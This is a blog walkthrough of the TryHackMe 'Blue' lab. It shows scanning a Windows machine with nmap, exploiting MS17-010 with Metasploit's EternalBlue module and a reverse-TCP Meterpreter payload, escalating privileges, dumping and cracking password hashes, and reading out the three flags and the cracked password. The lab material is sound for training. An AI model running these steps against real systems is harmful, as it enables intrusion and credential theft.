TryHackMe Blue | CTF Walkthrough

 

This article is about Blue capture the flag created by Pritam Kumar Mukhopadhyay on TryHackMe. It is a free room and everyone can join it after log-in to the website.

Description: Deploy & hack into a Windows machine, leveraging common misconfigurations issues.

Video Link is given at the end of the document you can check there.

This challenge teaches us how a small misconfiguration can end up your whole machine hacked. Let’s get started.




 
    RECON

    As we have get machine’s IP, let’s scan it with nmap.

    So we scan the machine for open ports but faster 
    
    

 
 Now next step is need to know the services and the service versions running on the open ports.

    This will take time based on the performance of your system. 
    
    


  There are different scripts present in nmap, so to know about the vulnerability present in the system we will use the script "vuln".
    
These are default scripts.
    

The scan result is 

    

Vuln script gives us the details of the vulnerability present.


GAINING ACCESS

   So now we start msfconsole.

    


We searched for MS17-010
We use auxiliary/scanner module for verifying whether the vulnerability is present or not.
The exploit modules are used to exploit the vulnerability.

We have chosen here - auxiliary/scanner/smb/smb_ms17_010



We need to set the RHOSTS which is the target machine ip
   set RHOSTS <target-ip>



Now after this auxiliary/scanner module has been executed we will get to know whether the machine is vulnerable or not.

Now the part comes with exploit module.

    We will use the exploit - exploit/windows/smb/ms17_010_eternalblue

We set RHOSTS.
    

payload is a set of malicious codes that carry crucial information that can be used to hack any device beyond limits

PAYLOAD used - windows/x64/meterpreter/reverse_tcp

We need to set the RHOST as before and then also we need to set LHOST.
RHOST - target ip
LHOST - hacker machine ip



METERPRETER SHELL 

After running the exploit we will get something like this :- 


This is a meterpreter shell which is a powerful shell which we can use to dump our hashes, escalate privileges, etc.
To escalate privileges: - 
    meterpreter> get system

We will then damp hashes using hashdump and crack the hashes online using crackstation.


Crackstation:- 
So the JON-PC has password alqfna22.

FINDING THE FLAGS

To get a shell in meterpreter:- 
    meterpreter> shell
You will get a windows shell
    


cmd command to display the text file in cmd shell:-
    C:/> type <file-name>.txt

The first flag is present in C:/
    
    flag{access_the_machine}

The second flag is present in C:/windows/system32/config

    flag{sam_database_elevated_access}

The third flag is present in C:/Users/Jon/Documents
    
    flag{admin_documents_can_be_valuable}



Video Link:- 

https://youtu.be/0Z75QEwgtAw

Hope you found this document useful. Please subscribe my channel.

https://www.youtube.com/channel/UCVVCjPlGlfIqfCcd--JEiog



Comments

Post a Comment

Popular posts from this blog

Crack Zip Passwords

Image
       John the Ripper is a free password cracking software tool. Originally developed for the Unix operating  system, it can run on fifteen different platforms. John the Ripper works  by using the dictionary method favoured by attackers as the easiest way to guess a password. I t takes text string samples from a word list using common dictionary words. It can also deal with encrypted passwords, and address online and offline attack JOHN THE RIPPER DOWNLOAD LINK:-                      https://www.openwall.com/john/     CODES FOR JOHN THE RIPPER     Loading hashes and saving it into the file:-                       Cracking hashes using default wordlist :-                 Cracking hashes using wordlist :-              ...
Read more